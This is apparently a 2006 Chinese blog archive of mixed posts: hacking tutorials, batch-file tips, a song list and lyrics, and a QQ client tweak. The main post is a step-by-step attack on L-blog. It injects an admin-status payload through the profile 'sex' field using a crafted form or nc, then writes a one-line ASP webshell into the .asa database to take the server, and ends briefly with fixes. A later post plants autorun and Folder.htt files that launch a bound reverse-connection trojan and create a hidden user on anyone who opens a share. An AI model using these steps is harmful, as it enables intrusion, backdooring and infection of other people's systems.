L-blog是一款较为成熟的blog程序,拥有强大的功能和简便的操作,这些优点使L-blog有着数量可观的用户群。然而,L-blog程序中代码的过滤不严,导致黑客可以向L-blog中写入恶意数据,从而将自己的账号提升为管理员,进而登录L-blog后台管理系统,写入webshell,并进一步得提升权限,从而获取服务器的控制权。威胁如何产生?我们又该如何防范?这正是本文所要讲述的重点。
一、洞查先机,漏洞成因早知道
下载L-blog程序,用记事本打开其中的member.asp,可以找到如下代码:“mem_Sex=”&CheckStr(Request.Form(“mem_Sex”))&””,这句代码是对用户在修改资料时的性别一栏进行更新,而这句代码却存在过滤不严的漏洞,黑客可以绕过验证,将需要写入的数据本地提交到“性别”一栏中,从而利用这个漏洞将账号提升为L-blog管理员。
目前网上使用最多的L-blog有两个版本,L-Blog V1.08 (SE) Final和L-Blog V1.10 AIO,后者是前者的升级版本,但是这两个版本都存在过滤不严的漏洞,由于两者的代码不同,因此有着不同的利用方法,下面我们就对这两个版本的利用方法进行阐述。
二、提升权限,构造本地提交页面
我们首先打开使用L-Blog V1.08 (SE) Final版本的blog,注册一个用户。完成后我们点击用户控制面板上的“修改资料”,进入“编辑个人资料”页面。这时我们点击IE的查看菜单,选择“源文件”,将弹出的源文件内容保存为test.txt。用记事本的“查找”功能可以找到如下代码:“form action=”member.asp?action=edit&edit=post””,由于我们需要本地提交,因此需要将这里的相对路径改为绝对路径,即将member.asp前面的网址补充完整。继续往下看,来到如下代码处:
“
男
女
保密”
这段代码就是让用户在修改个人资料时选择自己的性别,从正常的页面中我们可以看到,“性别”这一栏中是“男,女,保密”三个选项的单选框,那么我们又如何将恶意数据从“性别”这一栏写入呢?
选中上文中的这段代码,将其替换为“
”,然后保存这个文本文档,接着将这个文本文档的后缀名改为htm。用IE打开test.htm,网页会显示不全,但是可以看到,“性别”一栏处已经从单选框变成了文本框,这也就意味着我们可以写入任意数据了。
在“性别”一栏的文本框中输入:“0,mem_Status=”SupAdmin””(不包括引号),点击“确定编辑”即可完成本地提交。我们重新登陆L-blog,可以发现,在“用户中心”中多出了两个选项“发表日志”和“系统管理”(如图1),这两个选项是只有L-blog的管理员才能够看到的,因此证明我们已经成功将自己的账号提升为管理员了。
三、绕过验证,利用工具提交数据
在上文中我们已经说到L-blog的两个版本利用方法不同,那不同在哪呢?由于L-Blog V1.10 AIO更新了验证机制,使原有的本地提交页面这种方法已经不起作用。然而新版本只是更新了验证机制,而并没有从根本上修补漏洞,因此我们可以利用工具将数据提交上去,从而绕过新版本的验证机制,其效果和构造本地提交页面是一样的。
1.NC、WSockExpert,双剑合壁
NC和WSockExpert是本地提交入侵中经常用到的工具,WSockExpert用于数据包的抓取,NC用于数据包的提交。下面我们就来看看如何利用这两款工具绕过L-blog的本地提交验证。同上文中步骤,注册完成后来到“编辑个人资料”页面,我们运行WSockExpert,点击工具栏处的“打开”按钮,找到IE的进程,双击,选中当前L-blog的进程信息,点击“OPEN”进入抓包状态。我们切换回L-blog,在“编辑个人资料”页面中填入旧密码,点击“确定编辑”。这时我们会发现
WSockExpert中已经抓取到了许多数据包,其中可以找到一个以“POST”开头的数据包,这正是我们所需要的。选中以“PSOT”开头的数据包,在下方会出现其具体内容(如图2)。将所有的内容复制下来,保存为test.txt,最内容的最下方可以找到mem_Sex这一个参数,其默认的参数值为“0”,我们需要将它修改为“0,mem_Status=”SupAdmin””,由于我们修改后使整个数据包增加了22个字节,所以我们还需要对数据包中Content-Length参数进行相应的修改,完成后保存。
提示:在“编辑个人资料”页面中只需填入旧密码,其他选项一概不要填写,否则将使测试失败。
将test.txt和NC放在同一目录下,运行“命令提示符”,输入如下命令“NCwww.***.com 80 < test.txt”,其中的网址为L-blog的地址,这句命令的意思是将test.txt的内容提交到L-blog上。回车后我们回看到很多乱码,不用管它,重新登陆L-blog,是不是同样提升成功了呢?
2.L-blog漏洞利用工具,见血封喉
从上文中我们可以看到,这两种L-blog漏洞的利用方法都显得比较麻烦,而且一旦利用过程中疏忽了一个字节,那么测试也将以失败告终。因此有网络安全爱好者开发了L-blog漏洞的利用程序,可以很方便得对L-blog进行测试。
运行“L-Blog提权利用程序”,如图3所示,在地址一栏中填写欲测试的L-blog地址,在Cookie中填入你在L-blog中的cookie。至于cookie的获取,可以使用WSockExpert进行抓包,在“POST”数据包中可以找到Cookie字段,复制其后面的数值到L-blog漏洞利用程序中就可以了。接着在“旧密码”选项中填入账户的密码即可。最后点击“提交”,即可对L-blog进行测试,测试的效果和NC,WSockExpert进行测试是一样的。
四、得到webshell,后台写入木马
按照上面的步骤,我们可以很快得到L-blog的管理员权限,接下去我们可以在后台写入asp木马,从而得到一个webshell,获取更大的权限。
这里我们选用的asp木马是“冰狐浪子微型ASP后门”,这是一款C/S形式的asp木马,其分为客户端和服务端两部分,由于其服务端只有一句代码,因此也被称为“一句话木马”。由于L-blog的后台管理并没有可以写入大型asp木马的地方,因此“一句话木马”的优势就可以充分发挥出来了。
进入L-blog的后台,找到“数据管理”选项,查看L-blog的数据库地址,例如“d:\free\blogdata\acblog10.asa”,这里显示的只是数据库的本地路径,我们需要将它补充到网址后面,例如“http://www.***.com/blogdata/acblog10.asa”。然后进入“链接管理”,新建一项链接,如图4所示,其中“名称”和“图片”选项可以随便填,然后在“链接”一项中填入“冰狐浪子微型ASP后门”的服务端代码“”,其中“piao”为连接密码,完成后点击“编辑”即可。这样我们就可以将木马写入数据库了。
提示:写入的木马只对以asp或asa为后缀的数据库有效
运行“冰狐浪子微型ASP后门”的客户端icyfox007.htm,在“ASP URL”一项中填入L-blog的数据库地址,然后在“PassWord”一项中填入我们设置的连接密码“piao”,接着在下方选择需要执行的命令,点击“RUN”即可,执行成功后会弹出一个新窗口显示执行效果(如图5)。这样,我们就得到了一个功能强大的webshell。接下去,便可以对服务器进行各种控制了。
五、拒绝黑客,修改代码升级系统
由于L-blog的漏洞是由于代码的疏忽造成的,因此修补漏洞的方法十分简单,可以归纳为以下几点:
1.修改漏洞代码
从上文中可以得知,出现漏洞的一句代码为“mem_Sex=”&CheckStr(Request.Form(“mem_Sex”))&””,由于这句代码缺少一对单引号,造成过滤不严,因此我们只要将这对缺少的单引号加上去,就可以修补漏洞。修改完成后的代码为“mem_Sex=’”&CheckStr(Request.Form(“mem_Sex”))&”‘”。
2.升级最新版本
目前L-blog的官方网站上已经有新版本,新版本不存在此漏洞,因此可以通过升级最新的L-blog版本避免攻击。
3.修改数据库后缀
由于L-blog的后台没有可以写入大型asp木马的地方,因此想得到webshell必须使用“一句话木马”,而使用“一句话木马”的前提是数据库必须为asp或asa后缀,即直接可以在IE中浏览数据库内容。因此我们可以将数据库的后缀名改为mdb,这样即使L-blog被入侵,黑客也是无法得到webshell的,当然修改完数据库后缀后别忘了修改commond.asp中的数据库连接地址。
分类 : 技术文摘 | 发表时间 13-04-2006
一大早,笔者打开办公室电脑,顿时傻眼了。除C盘外的其它磁盘里的所有文件夹及文件全都不见了,每个磁盘中只留下一个“磁盘加密王”和一个“技术支持”的文本文档(图1)。但笔者从未用过“磁盘加密王”这个软件,也没有将电脑交给其他人使用,这究竟是怎么回事呢?双击F盘中的“磁盘加密王”,弹出“移动解密”对话框,提示需要密码才能完全解密。打开磁盘中的“技术支持”文本文件,发现文档中留下了一个QQ号,与其联系,告知要想解密需交人民币三百元。笔者的电脑几天前刚安装了正版Windows XP SP2和瑞星2006杀毒软件,使用的是Windows XP系统自带的防火墙,没想到昨天在上网时还是被黑客无声无息地入侵了。
问题分析
针对这个情况,笔者首先查看了被加密的几个磁盘空间,发现磁盘空间与加密前相比并没有减少。笔者确认磁盘数据并没有丢失,但被别有用心的人用软件加密了。笔者启动瑞星2006查杀病毒,没有发现病毒,在用瑞星2006扫描D和E盘时,都扫描到了笔者保存在磁盘中的文件夹和文件,只不过它们都保存在一个名为“Thumbs.dn”的文件夹中。但从“我的电脑”打开相应的磁盘却无法查看到这个文件夹,因此无法获取存放在磁盘中的资料。
笔者以前曾用WinRAR查看过隐藏在磁盘中的文件夹和文件。能不能通过WinRAR找到隐藏的“Thumbs.dn”文件夹呢?笔者打开WinRAR,利用“文件”菜单中的“改变驱动器”切换至F盘。在WinRAR主窗口中,F盘中包括“Thumbs.dn”在内的所有隐藏对象都显示出来了(图2)。
通过查找相关资料获悉,“磁盘加密王”实际是一款名为“高强度文件夹加密大师”磁盘加密软件。它不受系统影响,没有解密密码即使系统重装、Ghost还原,数据也依然加密。所以,没有密码一般不易破解。
加密原理
经过笔者的分析,“高强度文件夹加密大师”对文件夹及文件加密时,实质是对文件夹和文件的名称进行了加密处理,文件夹和文件本身内容并没有改变。
对文件夹进行加密时,软件对加密路径下的所有文件夹进行了改名处理,将原来的文件夹名称为以数字“1~m”(m个文件夹)为序重新命名,并在每个文件夹的数字名称后加上代码“.”。此代码是打印机系统文件夹的代码,因此,解密文件夹时必须要将此代码删除,否则得到的就是打印机的图标(图3)。
对文件的加密,软件同样是以数字为序对文件名采取了改名处理,将所有文件名主名改名为“1~n”(n个文件),扩展名改为“.mem”。
在“Thumbs.dn”文件夹中,有两个文件值得我们注意,即“117789687”和“117789687list.mem”,这两个文件存放的是密码相关信息。其中,“117789687list.mem”文件存放的是加密前文件夹及文件的名称数据及与加密后文件夹和文件名称对应关系等信息。不过,软件开发者已经对这两个文件的数据进行了算法处理,没有软件开发者提供的密码表,我们无法获取密码信息。另外,在“%systemroot%\\system32\\”下有这样一个文件“danine.dll”,它记录了软件目前已经加密了哪些磁盘和文件夹信息,用“记事本”可以直接打开查看。
解密文件夹
打开WinRAR,依次单击“文件→改变驱动器→F”,切换至需要解密的磁盘。在WinRAR主窗口中,双击“Thumbs.dn”,打开该文件夹。此文件夹中,我们发现保存在F盘上的所有文件夹。将每个文件夹名称数字序号后的“.”代码删除。然后,选中所有文件夹,单击工具栏中的“添加”按钮,将这些文件夹压缩成一个文件存放至E盘。最后,解压此压缩文件即得到所有存放在F盘中的文件夹及保存在文件夹中的文件。
解密文件
解密存放在磁盘根目录下的文件,我们要判断文件是否为RAR类型的文件,分两种情况进行。
1.RAR类型的文件
这类文件,我们只要直接选中它,单击工具栏中的“解压至”,然后选择文件解压存放的路径,将文件直接解压,实现解密。
2.非RAR类型的文件
对这类文件解密起来麻烦一些。首先,根据文件长度回忆原文件的类型。如果实在想不起来,你可以试试“文件夹嗅探器”(下载地址:http://www.onlinedown.net/soft/40923.htm),嗅探根目录下的所有“.mem”文件,单击工具栏中的测试文件类型工具,测试得出该文件的类型。然后,打开WinRAR,将该文件名的扩展名“.mem”改为原文件类型的扩展名。最后,用工具栏中的“添加”按钮,将此文件压缩打包存放至合适的位置,再解包得到原文件。
分类 : 娱乐休闲 | 发表时间 20-03-2006
1。陈慧琳-记事本。爱得痛了,痛的哭了,记载着我们过去的点点滴滴,让我们一起回忆.
2。王力宏-唯一。悠扬,流畅,很有韵味的感觉,大声对你深爱的人说你是我的唯一王力宏新专辑首支主打歌“唯一”,打动不少歌迷,觉得王力宏唱来格外有感情,原来是因为这首歌说的就是他自身的感动,凭吊一段逝去的恋情。在希腊,王力宏有感而发写下这首歌,回到台湾后,王力宏用钢琴伴奏、以英文歌词录下demo给工作人员听,副歌歌词王力宏以英文唱着“我不能爱你再多一些,已经倾我所有,超过极限”,说的就是自己的感觉,虽然他觉得自己用尽力气爱对方,无奈这样还不够维持这段感情,等到有时间好好静下心想想,才 发现这段恋情的伤痛仍藏在心中。.
3。水木年华-一生有你。第一次听就喜欢上了这首歌,你会不由自主的哼出来,很棒,旋律很好听水木年华-两位毕业于清华大学、酷爱音乐的才子。他们的组合不是偶然的对音乐的执着、对生活的热爱,在清华默然的熏陶中,卢庚戌、李健如约的走在一起,他们从大学中的惺惺相惜到签约后的相得益彰,无不向我们展示着过人的才华与人文的风范。在李健沉静忧郁的嗓音中,冷艳华美的气质瞬间显现,在卢庚戌热忱沙哑的演唱里,往事的追忆扑面而来,令我们的心怦然而动。在他们和谐的编配下,水木年华拥有了自我的光辉。在他们身上,我们同样看到了深厚、和谐、高贵和健康,这些优秀属于水木清华,这些优秀同样也属于这支正 积极进取的新组合–水木年华。 .
4。王力宏-i’m lovin’it。麦当劳全球主题曲,不多说,大家自己去听主打歌《i’m lovin’it》(我就喜欢)是麦当劳2003年度最新广告歌的华语版,此曲的英文版本由justin timberlake演唱。生活化风味浓烈的歌词配以流畅的休闲节奏,王力宏用hip-hop的风格活泼、诙谐的“说”完了歌曲。整首歌曲听着虽然舒服,但是给人的商业味道太过浓厚。它的价值也就是做为在我们吃着薯条喝着可乐时放松身体的休闲工具而已。 .
5。s.h.e-找不到。爱的方向找不到,我在你的心中,还剩多少 .
6。林俊杰-就是我。很有节奏感的,我就是听这首歌认识他的,不错 .
7。gareth gates-anyone of us。很好听,单曲”anyone of us”顺利拿下了冠军宝座,这首歌曲实在是非常动听,相信很多朋友也都很喜欢!如果你还没听过,那一定要留意这首歌! .
8。郑中基-你的眼睛背叛你的心。一代老歌,感动的不知说什么好 .
9。lene marlin-a place nearby。温柔醇厚的声音,静静地用心体会,很舒服21的挪威女孩marlin,自己写歌自己唱,被称之为来自北国的音乐精灵。清丽的声音,合着淳朴的吉他声,伴着悠扬的击鼓… ….
10。bon jovi-say it isn t so。我唯一觉的好听的重摇滚,赞,这首歌收录于《crush》这张专辑。这是bon jovi首张在纽泽西录音的作品,是张汇聚团员5年来心情写照、不加刻意不添矫情便浑然天成的摇滚专辑,将bon jovi真实的自我、世纪交替、准备玩乐的态度完美结合并呈现最具震撼力之新世纪作品 .
11。britney spears-baby one more time。小甜甜布兰妮的经典,好听,不多说她的处女作—首张大碟《baby one more time》在美国刚推出三周,三周都攻占大碟榜的no.1销量竟达双白金(200万张),而她同名的首张单曲,同样一举打上美国 billboard单曲榜的榜首,销量超过100万张。她的骄人成绩改写了美国billborad的历史:成为billborad有史以来在同一周中并获(大碟、单曲)双料冠军的最年轻的歌手!这里创下了这样几个记录:首位新人在同周获得singlech art和album chart的双料冠军:有史以来最年轻的女歌手同获双聊冠军;billborad史上第一张同名单曲和大碟同时占据no.1 …… .
12。forever and ever-because i love you。很经典的说,没有人不知道吧 .
13。eminem-stan。非常好听的rap曲风 这是当年超红的单曲,dido也是因为这个才红的。歌曲分为4个verse,chorus是dido唱的,内容大概是一个歌迷叫 做stan给eminem写信,写了两封,但是没有收到回信,该孩子有点愤怒,于是带着怀孕的女朋友(dido饰)雨夜开车狂奔 ,不慎掉入海中。不久后em受到了信,一边看电视,一边写回信,写道一半的时候才发现电视上的新闻中正是stan的死讯。于是, damn,it was you.em的歌曲向来都是故事性很强,这首歌曲也是被非英语国家的孩子们所喜爱的,因为语速不是很快。所以语言方面的困难减少 了很多。em也是想借此歌曲告诉广大的歌迷,千万不要太沉溺于他,他只不过是都大家开心而已 .
14。马修连恩-bressanone。象天籁之声啊,让人如痴如醉,用一个最俗的词儿:百听不厌很难用语言表述听bressanone的感受—吟唱着离别的无奈与不舍结尾的火车轰隆隆的声音。突然,想起当年听齐秦《狼》 时的情形,虽然语言不同,但感受应该是相近了吧!.
15。celine dion-a new day has come。再度演绎《my heart will go on》之经典作品超级天后席琳迪翁在暂别歌坛两年后复出后,首支单曲 (a new day has come)率先在电台首播,旋即成为全球播歌排行和听众点播冠军!席琳迪翁熟悉的歌声和令人感动的旋律,又再次展现,许多流行电 台中具有多年播歌经验的dj,在听过席琳新的单曲后都一致肯定,席琳迪翁这张复出新专辑《新的一天来临》,是绝对令人期待的! .
16。s.h.e-only lonely。节奏好好哦 .
17。enrique iglesias-hero。情歌王子恩里克-伊格里莱斯,好听啊,心灵为之一震全球狂恋至爱 拉丁情人再占流行排行billboard no.3最佳情歌力作 .
18。梁静茹-fly away。这一次问我自己都说我毫不怀疑,爱上你终于我发现我还有勇气,很好听fly away,勇气更大,爱意更深,拯救小王子的爱情就在唱片行发生了。经典梁式情歌再度发声,二十五岁半熟女为了意中人不惜耍点坏 ,静茹歌声演技合而为一,戏剧新人陈宇凡跟静茹的首次萤幕初吻,都因为‘fly away’,吻出最爱的故事,感动最深的情歌 .
19。groove coverage-far away from home。好久没听到这么好听的歌了,groove cover age带给你全新的感觉,歌声很性感,不错,实在是不错动感十足的far away from home以被众多知名dj誉为当今舞曲最为精华的传世之作 .
20。hayleywestenra-neversaygoodby。天使的纯真演绎,天籁女歌手,今年才16岁哦,hayleywestenra对声线的把握表现得淋漓尽致 .
21。nelly kellyrowland-dilemma。由nelly及destiny‘schild成员kellyrowland合唱,第一次听到kelly单独的声音,是她与饶舌巨星nelly搭档演唱的《 dilemma》一曲,这首歌曲虽然风格老套,但仍然在 全美电台创下近两个月蝉联冠军宝座的纪录 .
22。nana-lonely。英文歌曲,大家知道吗,同样很好听哦 .
23。周渝民-make a wish。曾几何时,为之心动 .
24。s.h.e-他还是不懂。很多人喜欢这首歌,很感人,旋律优美 .
25。phil collins-anotherday in paradise。翻译过来就是天堂里的另一天,堪称百听不厌,欧美经典 .
26。caron nightingale-promises dont t come easy。温暖的中音与蔡琴颇有些相似,舒缓的演唱娓娓道来,容易引起听者的共鸣,加上上口的旋律,使之成为一首百听不厌的好歌 .
27。s.h.e-十面埋伏。听
分类 : 网络日志 | 发表时间 19-03-2006
安装新版珊瑚虫QQ以后,默认会在好友列表中显示经常在线的名为“珊瑚虫”的好友。这个东东,即使删除了下次登录它又会自动生成的,比较烦人。
用下面的办法可以让这个珊瑚虫好友永远消失:
可用记事本打开安装目录下的CoralQQ.ini文件,安装目录通常是 C:\progrma files\tencent\QQ\ ,将这个文件中的“KQL=1”一行改为“KQL=0”。然后保存,关闭。
再启动珊瑚虫版QQ,你会看到“珊瑚虫”好友的头像变成灰色。OK,现在就可以将它删除了。
分类 : 技术文摘 | 发表时间 16-03-2006
在使用电脑的过程中我们会遇到很多的问题,烦人的广告窗口不停的弹出;不停的在多套网络配置中切换;时常忘掉备份网络中的关键数据;加密的文件夹由于误操作无法打开。你想过没有以上这些问题都可以通过一个小文件解决?你甚至可以借助它解决几乎所有在使用电脑时遇到的问题。它就是功能强大的bat文件。
一、查漏补缺——给系统功能添把火
我们的操作系统虽然功能强大,但是在某方面的应用上依旧存在欠缺,如:没有定时关机软件。而用bat文件可以解决很多这类问题。
1.关机与重启
我们先做个让电脑在每天指定时间关机的bat,具体方法如下:
打开附件中的记事本,然后在里边写入,at 22:00 shutdown -s -f,然后选择“文件→保存”,保存类型选择“所有文件”,然后将其命名为:shutdown.bat。如果你希望每天都在晚上十点关机,则将这个文件拖动到“开始→程序→启动”中,这样每次开机该文件都将被执行,其具体含义是,at 22:00在每天十点,shutdown -s -f关机且关闭所有未响应程序。
如果你需要经常重启机器,可以编写一个快速关机的bat文件,还是打开一个记事本,写入:
@echo off
//关闭命令行显示
%systemroot%\system32\shutdown -r -t 0
//-r参数表示重启计算机,-t表示时间后边跟随等待秒数,为0则表示马上重启
2.磁盘整理
Windows XP自带的磁盘碎片整理程序无法进行全盘整理,我们可以编写一个全盘整理的bat,在记事本里边输入:
defrag c: /f /v
defrag d: /f /v
//有几个分区就写几行,其中-f表示即使可用磁盘空间不足,也强制进行磁盘整理。-v表示显示整理结果。
将这个存为bat文件,再双击即可。如果你嫌整理的时间太长,不愿意在一旁守着,可以在文件的结尾输入:shutdown -s -f,让其执行完关机即可。
二、一律从简——让网络操作变轻松
访问共享文件夹、备份网络数据、切换网络配置等常规网络操作,如果采用传统做法,实在是费时费力。用bat文件,一切将可以简化为一个双击动作。
1.备份还原网络配置
对于经常使用笔记本电脑在两地上网的朋友,切换网络配置就成了家常便饭,总是该来该去实在麻烦,用bat文件可以使一切都变得简单。
首先选择“开始→运行”,输入:cmd,回车后进入命令行界面,然后输入:netsh -c interface dump>d:\home.txt,回车后,系统将会把你当前的网络配置备份到d盘的home.txt文档中。
然后开始编写bat文件,只有简单的一行:netsh -f d:\home.txt,保存为bat文件,以后双击该文件就会应用home.txt中的网络配置。如果你觉得两个文件烦,也可以将两个文件写成一个bat文件:
@echo off
netsh interface ip set address name=”本地连接” source=static addr=10.10.10.1 mask=255.255.255.0
//设置本地连接的ip地址为:10.10.10.1,子网掩码为:255.255.255.0
netsh interface ip set address name=”本地连接” gateway=110.10.10.2 gwmetric=0
//设置网关
netsh interface ip set dns name=”本地连接” source=static addr=10.10.10.3 register=PRIMARY
//设置主dns
netsh interface ip add dns name=”本地连接” addr=10.10.10.4
//设置备份dns
netsh interface ip set wins name=”本地连接” source=static addr=none
//设置wins
2.在局域网中群发信息
如果你局域网中的机器没有禁止信使服务的话(启用方法为:在“运行”里输入:services.msc,双击里边的Messenger,选择启用即可),当需要定时向全网发送消息时,完全可以用批处理文件实现,实现方法是:
rem 准备发布“9点断网”给局域网所有计算机
//显示在bat运行前,起到提示作用
pause
//暂停运行,按任意键继续,如果需要定时运行,则不要此段
net send * 9点断网
//发送下“9点断网”的信息,网段中所有的机器,“*”表示所有的机器
将其保存为bat文件,双击后得到所示的效果。再按键盘上的任意键,信息将被发送到全网。如果你希望它定时发送,则将pause字段去掉,然后将其加入到计划任务中即可。
3.打开或关闭网络共享
当你需要共享某个远程的文件夹时,总要跑到本地去操作,如果数量众多,就有可能跑断腿,我们可以编写一个自动共享硬盘的bat文件,将文件发给用户,只要其双击该文件,即可实现共享的目的。
@echo off
echo REGEDIT4>c:\1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\E]>>c:\j.reg echo “Flags”=dword:00000102>>c:\j.reg
//Flags用于是确定共享目录的访问方式,其中”Flags”=dword:00000102是完全共享,101是只读,103是根据密码访问。
echo “Parm1enc”=123:>>c:\1.reg
//Parm1enc键值保存着完全访问方式下的密码
echo “Parm2enc”=456:>>c:\1.reg
//Parm2enc键值保存着只读访问方式下的密码
echo “Path”=”D:\”>>c:\1.reg
//Path键值是共享文件夹的路径
echo “Remark”=”我共享了你的D盘”>>c:\1.reg
//Remark键值是备注
echo “Type”=dword:00000000>>c:\1.reg
REGEDIT /S c:\j.reg DEL c:\j.reg cls exit
用户运行这个bat文件后,再注销一下,文件夹就会被共享出来了。如果你每天都需要访问某个共享文件夹,且这个共享文件夹设置了密码,你还可以让bat文件帮你在开机的时候先输入密码,你再访问时就只需要双击打开即可。输入:net use \\192.168.0.1\IPC$ “1234″ /user:”administrator,这个表示访问PC机192.168.0.1上边的共享文件夹,用administrator用户,密码为:1234。将其保存为bat文件,并将其加入到启动组中即可。
共享文件夹管理不当,会产生严重安全隐患,所以有时为了安全,需要批量卸载掉共享文件夹,其实只要将命令:net share c$ /del加入到bat文件中即可,其中c$为共享文件夹的名字,完整的例子可以到XXXX下载。
4.备份网络数据
你还可以利用bat文件将数据备份到局域网内的某台文件服务器上,这样就省去了复制粘贴的麻烦,具体做法是:
set source=e:\work
//文件来源为本机e盘的work文件夹
set dest=\\192.168.0.1\backup
//目标文件夹为PC机192.168.0.1的backup文件夹
net use \\192.168.0.1\IPC$ “1234″ /user:”administrator”
xcopy %source% %dest% /e /v /r /y /z
//将源盘文件拷贝到目的服务器
将其保存为bat文件,以后只要双击此文件即可完成备份任务。
分类 : 系统安全 | 发表时间 15-03-2006
PS:测试了一下,还确实可以,推荐给各位珊瑚虫爱好者!
QQ“珊蝴虫”版一直是小编最喜欢的QQ改进版之一,之所以喜欢它全是因为“珊蝴虫”去掉了QQ原版的好多赘余功能。“珊蝴虫”虽好但有一点始终不能令小编满意,就是在安装完成后,好友列表中会默认显示名为“珊瑚虫”的好友,而且即使删除了下次登录后它又会自动生成。现在小编就教您一个办法让这烦人的“珊瑚虫”永远消失。
方法如下:
可用记事本修改CoralQQ.ini文件,将其中的“KQL=1”一行改为“KQL=0”,保存该文件。如图:
再启动珊瑚虫版QQ,你会看到“珊瑚虫”好友的头像变成灰色,OK,现在可将它删除了。
翻开随身携带的记事本
写着许多事都是关于你
你讨厌被冷落
习惯被守候
寂寞才找我
我看见自己写下的心情
把自己放在卑微的后头
等你等太久
想你泪会流
而幸福快乐是什么
爱的痛了
痛的哭了
哭的累了
日记本里页页执着
记载着你的好
像上瘾的毒药
它反复骗着我
爱的痛了
痛的哭了
哭的累了
矛盾心里总是强求
劝自己要放手
闭上眼让你走
烧掉日记重新来过
我看见自己写下的心情
把自己放在卑微的后头
等你等太久
想你泪会流
而幸福快乐是什么
爱的痛了
痛的哭了
哭的累了
日记本里页页执着
记载着你的好
像上瘾的毒药
它反复骗着我
爱的痛了
痛的哭了
哭的累了
矛盾心里总是强求
劝自己要放手
闭上眼让你走
烧掉日记重新来过
爱的痛了
痛的哭了
哭的累了
矛盾心里总是强求
劝自己要放手
闭上眼让你走
重新来过
分类 : 网络日志 | 发表时间 15-03-2006
大家知道,通过Ping和Tracert程序就能判断目标主机类型 ,Ping最主要的用处就是检测目标主机是否能连通。Tracert利 用ICMP数据包和IP数据包头部中的TTL值,防止数据包不断在IP 互联网上永不终止地循环。
许多入侵者首先会Ping一下你的机子,如看到TTL值为 128就认为你的系统为Windows NT/2000;如果TTL值为32则认为目标主机操作系统为Windows 95/98;如果TTL值为255/64就认为是UNIX/Linux操作系统。既 然入侵者相信TTL值所反映出来的结果,那么我们只要修改TTL 值,入侵者就无法入侵电脑了。
操作步骤:
1.打开“记事本”程序,编写批处理命令:
@echo REGEDIT4>>ChangeTTL.reg
@echo.>>ChangeTTL.reg
@echo [HKEY_LOCAL_MACHlNE\System\CurrentControlSet\Services\T cpip\Parameters]>>ChangeTTL.reg
@echo “DefaultTTL”=dword:000000″>>ChangeTTL.reg
@REGEDIT /S/C ChangeTTL.reg
2.把编好的程序另存为以.bat为扩展名的批处理文件, 点击这个文件,你的操作系统的缺省TTL值就会被修改为ff,即 10进制的255,也就是说把你的操作系统人为地改为UNIX系统了 。同时,在该文件所在的文件夹下会生成一个名为 ChangeTTL.reg 的注册表文件。如果你想运行完这个批处理文件而不产生 ChangeTTL.reg文件,可以在此批处理文件的最后一行加上 deltree/Y ChangeTTL.reg,就可以无须确认自动删除ChangeTTL.reg文件 。
说明:在上面的命令中,echo是DOS下的回显命令,如 果想看到程序执行过程,请将“@”去掉。“> >”产生的内容将追加到它后面的文件即ChangeTTL.reg中。 而“DefaultTTL”=dword�000000ff”则是用来设置系统缺省TTL 值的,如果你想将自己的操作系统的TTL值改为其他操作系统的 ICMP回显应答值,请改变“”DefaultTTL””的键值,要注意将 对应操作系统的TTL值改为十六进制才可以。
这样,当入侵者Ping你的机器时,他得到的就是一个假 的TTL值,这个假的TTL值就会误导对方,使入侵者的判断出现 失误,因为针对不同的操作系统的入侵方法并不一样,所以用 这个方法欺骗对方,可以让他摸不着头脑!利用这个方法欺骗 入侵者是不是很妙啊?快试试吧!
分类 : 技术文摘 | 发表时间 10-03-2006
文章作者:Virgo [E.S.T](霜风 [E.S.T])
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
发表于黑客在线第3期
转发时没有测试,不知是否完全可行!
常在河边走,哪有不湿鞋,本人因为经常和一些黑友打交道,自然遭受过许多入侵,被扫描更是难免。前几天上网时,网速突然暴慢,我关了QQ和所有的网络应用软件后,右下角的网络连接图标还是闪个不停,莫非是被人扫描了?可是我没装防火墙(大家可不要学我),于是我想到了用嗅探器看看,一嗅果然嗅出了名堂,如图1。
看到了吧,从XXX.XXX.XXX.99机的4854端口发送数据包到我机(xxx.xxx.xxx.58)的1433端口,又返回去,这是典型被扫描的症状。我的机子更本没有SQL-SERVER哪来的1433端口?100%是被扫了,拿到IP后,先看看是有没有跟QQ上好友是一样的,看了一下没有,不管这些先用流光判断对方的系统,
。对方是NT,那就好半了,先用x-scan扫一下。听了一首歌后发现没有弱口令,开了以下端口:
端口21开放: FTP (Control)
端口139开放: NETBIOS Session Service
端口443开放: HttpS, Secure HTTP
端口445开放: Microsoft-DS
端口3389开放: Windows 2000 remote admin
暴力破解21端口?太耗时间几率也小,139?NETBOIS?没口令一切都是空谈,3389?输入法?大海捞针。
于是我决定来此引狼入室,再来个瓮中捉鳖,其实蜜罐就是这道理。开工喽,首先先打开注册表,把空连接打开(注:把注册表里HKEY_LOCAL_MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Lsarestrictanonymous REG_DWORD 0×2 改为0×0, 关闭所有共享,只把3个文件夹的共享打开,第一个文件夹里放置两个文件:Folder.htt,desktop.ini。
如图2
Folder.htt太长,这里省略,想看的请下载完整版。
此文件可以在WINDOWS目录下找到,不过先要设置为“显示系统保护文件”
用记事本打开,在一段代码与另一段代码之间插入以下代码,
其中关键代码为:
desktop.ini的代码为:
[ExtShellFolderViews]
Default={5984FFE0-28D4-11CF-AE66-08002B2E1262}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.htt
[.ShellClassInfo]
ConfirmFileOp=0
制作方法很简单,就再现成的folder文件代码中添加以上代码就可以拉
文件夹和Folder.htt的属性设置为,并把Folder.htt和desktop.ini隐藏,最后把文件夹选项改为允许文件夹中使用WEB,如图3,只读只要对方访问了第这个文件夹,就自动生成一个用户名为aaa密码aa,并向123.123.123.123发送狼来的短信。
第2个文件夹也放两个文件:autorun.inf和flash.exe
flash.exe是灰鸽子反弹木马,马中极品。
autorun.inf代码如下:
[AutoRun]
OPEN= flash.exe /autorun
只要对方访问了第这个文件夹,会自动运行flash.exe
避免被发现已经和另一个flash动画合并了。
步骤:
1,启动BindFile,如图6
2,添加要合并的软件,这里我们添加HGZ.EXE和FLASH
(注:由于合并器默认只支持EXE文件,我们添加时再添加框内输入:*.*就会出现所有文件这事就可以添文件拉)
为了保险起见我还把AUTORUN隐藏了,只要右键点击后进入属性里把隐藏打上勾,再点应用OK拉
